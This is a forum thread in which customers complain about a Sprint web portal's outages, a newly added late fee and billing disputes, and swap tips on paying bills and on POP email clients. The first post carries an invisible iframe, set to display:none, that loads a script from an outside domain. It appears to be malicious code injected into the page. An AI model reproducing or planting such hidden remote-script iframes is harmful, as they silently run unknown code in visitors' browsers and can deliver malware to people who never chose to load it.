I have a T1 line and it always takes forever, or is completely down. No other website gives me such problems. Funny thing, it works fastest why I click "pay invoice."

I hate these people.

Also, did anyone notice they instituted a 5% late fee last month. Yeah, just hit me with that when I refused to pay b/c they overcharged me. Only way to get them to take everthing back: "Cancel service."<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Personally i just have them deduct it from my credit card, because i hate writing checks, they post the bill and don't charge your card for like 15 days or so, so yo have time to dispute it, or have your card not pay,

But i was saying, i hope that if there is a new late fee, then the "terms of service" include somthing on late fees (i don't think they would be that dumb) but, if they change th terms of the deal they have to send you a new "terms of service" and i don't remember getting any new terms.

I agree, pretty much one of the worst customer websites out there.

I always pay my bill with PayPal Billpay. Free and no hassle. Gotta love paypal....

Too funny that you mentioned that late fee thing. I was just on the phone demanding to talk to "Legal" and using threatening words like "Class Action Suit"

They did add the late fee thing to their "Terms and Conditions", but that doesn't always mean a damn thing, just ask Blockbusters Video

Anyway, I am over it now, but this will definitely be "over the dinner table" conversation with my attorney hubby.

hmm.. just went to my webspace at sprint and navigated thru it very well...

it is totally up and down lately.

from what I am seeing it looks like they REALLY ARE making some improvements to their Shortmail and Web Messaging. Lets keep our fingers crossed and hope that when it is finally done with it will be an improvement.

check out the eudora internet suite if you haven't already.. sprint web will finally let you use pop/smtp. eudora runs great.. i just got it today...

eudora has been out for ever and it allowed you pop service... sprint pcs has just finally opened up some pop servers so that us sprint folks can use their service... that was a good save on their part...
now only if they can keep the site up for folks to use 24 hours a day...

personally, for pop access, i use gopherking...
